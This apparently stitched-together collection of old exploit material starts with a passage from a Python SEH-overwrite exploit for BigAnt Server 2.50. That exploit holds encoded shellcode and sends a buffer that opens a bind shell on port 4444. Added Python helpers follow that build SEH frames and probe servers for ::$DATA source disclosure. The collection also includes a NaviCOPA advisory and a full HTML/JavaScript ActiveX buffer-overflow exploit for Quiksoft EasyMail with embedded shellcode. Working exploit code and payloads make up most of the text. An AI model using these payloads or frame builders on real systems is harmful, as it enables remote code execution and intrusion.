"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")


payload = "\x41" * 985 # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
nops = "\x90" * 10 # nop sled
sc = shellcode # 710 bytes available for shellcode

print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host,port))
except:
    print "[x] Error establishing connection\n"
    sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"
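SIDVault, the Firefox and Ipswitch exploits and BigAnt above all use the same SEH overwrite layout: filler up to the exception registration record, a short jump in the nSEH slot, a pop/pop/ret address in the handler slot, then a NOP sled and the shellcode. The following helper, added here as an example and not taken from any of those exploits, builds that frame from the offsets and checks it. It encodes the short jump for both the forward (BigAnt, +8 = `\xeb\x06`) and backward (SIDVault, -10 = `\xeb\xf4`) cases, and flags terminator bytes such as the NUL in SIDVault's 0x00401029 that the transport protocol would cut the buffer at.

```python
import struct


def short_jmp(distance):
    """`jmp short` that lands `distance` bytes from the start of the 2-byte
    instruction itself. The rel8 operand is relative to the *next*
    instruction, hence the -2."""
    rel = distance - 2
    if not -128 <= rel <= 127:
        raise ValueError("short jump out of range: %d" % distance)
    return bytes([0xEB, rel & 0xFF])


def p32(addr):
    """Little-endian DWORD, the form an address takes in memory on x86."""
    return struct.pack("<I", addr)


def build_seh_frame(seh_offset, ppr_addr, shellcode, nop_sled=10, filler=b"\x41"):
    """Lay out filler | nSEH | SEH | NOP sled | shellcode so that the nSEH
    field starts exactly `seh_offset` bytes into the buffer."""
    nseh = short_jmp(8) + b"\x90\x90"        # over nSEH (4) + SEH (4) into the sled
    return filler * seh_offset + nseh + p32(ppr_addr) + b"\x90" * nop_sled + shellcode


def seh_record(frame, seh_offset):
    """Return (nSEH, SEH) as they would be read from the overwritten record."""
    return frame[seh_offset:seh_offset + 4], frame[seh_offset + 4:seh_offset + 8]


def bad_chars(data, bad=b"\x00\x0a\x0d"):
    """Byte values from `bad` present in `data`. NUL ends an LDAP string,
    CR/LF end an IMAP or HTTP line: any of them truncates the buffer."""
    return sorted({b for b in data if b in bad})


if __name__ == "__main__":
    # Constructed example using the BigAnt offsets above and int3 as a stand-in for shellcode.
    frame = build_seh_frame(985, 0x0f9a196a, b"\xcc" * 16)
    nseh, seh = seh_record(frame, 985)
    print("nSEH", nseh.hex(), "SEH", seh.hex(), "bad bytes:", bad_chars(frame))
```

Run `bad_chars` over the candidate handler address before committing to it: an address with a NUL only works when, as in SIDVault, the protocol's own terminator can supply that final byte.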

NaviCOPA Web Server 3.01 Remote Source Code Disclosure

NaviCOPA Web Server 3.01 is a Windows based HTTP server. This is the latest version of
the application available.

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means,
the same ::$DATA alternate data stream request that affects Xerver above.


NaviCOPA - Technical Details

http://[ webserver IP]/[ file ]::$DATA

http://172.16.2.101/index.html::$DATA

http://172.16.2.101/default.asp::$DATA

http://172.16.2.101/index.php::$DATA
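Both the Xerver and NaviCOPA advisories above describe the same test: request a script by name with ::$DATA appended and see whether the server returns the file's source instead of running it. Added example, my own code and not from either advisory: a probe that builds that URL, compares the normal response with the ::$DATA response for the same file, and classifies the result. The sample bodies in the main block are constructed from the advisory's second sample case so the classification runs offline; `check()` performs the live requests against a host you are authorised to test.

```python
from urllib.request import Request, urlopen
from urllib.parse import urljoin

# Markers that only appear in unrendered server-side source. Had the server
# executed the script, none of these would be in the body it returned.
SOURCE_MARKERS = (b"<?php", b"<%", b"#!/usr/bin/perl", b"#!/usr/bin/env perl")


def normal_url(base, path):
    return urljoin(base.rstrip("/") + "/", path.lstrip("/"))


def probe_url(base, path):
    """The request the advisories describe: the file name with the NTFS
    default data stream name appended."""
    return normal_url(base, path) + "::$DATA"


def looks_like_source(body):
    """True when the body contains server-side code that should have run."""
    return any(marker in body for marker in SOURCE_MARKERS)


def classify(body, stream_body):
    """Compare the normal response with the ::$DATA response for one file.
    'disclosed': the stream request exposed source the normal request did not.
    'rejected':  the server refused the stream name (empty body).
    'static':    both look alike, e.g. a plain .html file as in sample case 1."""
    if not stream_body:
        return "rejected"
    if looks_like_source(stream_body) and not looks_like_source(body):
        return "disclosed"
    return "static"


def fetch(url, timeout=5):
    """GET `url` and return the body, or b'' on any error."""
    try:
        with urlopen(Request(url, headers={"User-Agent": "ads-probe"}), timeout=timeout) as r:
            return r.read()
    except Exception:
        return b""


def check(base, path):
    """Live check: fetch the file normally and via ::$DATA, then classify."""
    return classify(fetch(normal_url(base, path)), fetch(probe_url(base, path)))


if __name__ == "__main__":
    # Constructed responses modelled on the advisory's sample case 2; no network needed.
    rendered = b"<html>\n<body>\nMy first ASP script!\n</body>\n</html>"
    leaked = b'<html>\n<body>\n<%\nresponse.write("My first ASP script!")\n%>\n</body>\n</html>'
    print(probe_url("http://172.16.2.101", "default.asp"))
    print(classify(rendered, leaked))
```

Probe a script file, not a static one: sample case 1 (index.html) returns the same bytes either way and tells you nothing about the handler lookup.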


<!--
Description: Remotely exploitable buffer overflow in the ActiveX component of
Quiksoft EasyMail 6.0.3.0 allows arbitrary code execution in the
user context.


Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)


Date: September 17th, 2009

Severity: Medium (remote code execution in the user context)

References: http://www.devtarget.org

III - OVERVIEW

Quote from quiksoft.com: "The EasyMail Products are relied upon by over thousands
of international corporations, federal, state and local organizations, and individual
developers. Quiksoft has established the EasyMail products as "the professional,
reliable, and easy to use choice for e-mail development". More information about
the product can be found online at http://www.quiksoft.com.

IV - DETAILS

The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX component
to facilitate the development of IMAP4-aware applications. The connect() function
of this component is prone to a classic buffer overflow vulnerability when a
particularly long argument is passed and the application attempts to copy that
data into a finite buffer. This allows for the execution of arbitrary code in the
user context.

V - MITIGATING MEASURES

Either set the kill bit for the relevant ActiveX component (clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)
or install the latest version of Quiksoft EasyMail, which is not considered vulnerable.
The kill bit is the Compatibility Flags DWORD value 0x400 under
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0CEA3FB1-7F88-4803-AA8E-AD021566955D};
with it set, Internet Explorer refuses to instantiate the control whatever version is installed.

VI - NOTES

The code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis Provencher
for drawing my attention to Quiksoft EasyMail. The shellcode below is rather harmless and
executes calc.exe.

Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0

-->

<html>
<head>
<title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
<script language="JavaScript" defer>
function Check() {
    var buf = 'A';
    while (buf.length <= 440) buf = buf + 'A';


    // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
    var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
"%4e%31%75%74%38%70%65%77%70%43");

    var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English
    var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

    var m = buf + eip + nop + shellcode1 + nop;
    obj.connect(m);
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
Failed to instantiate object.
</object>
</body>
</html>
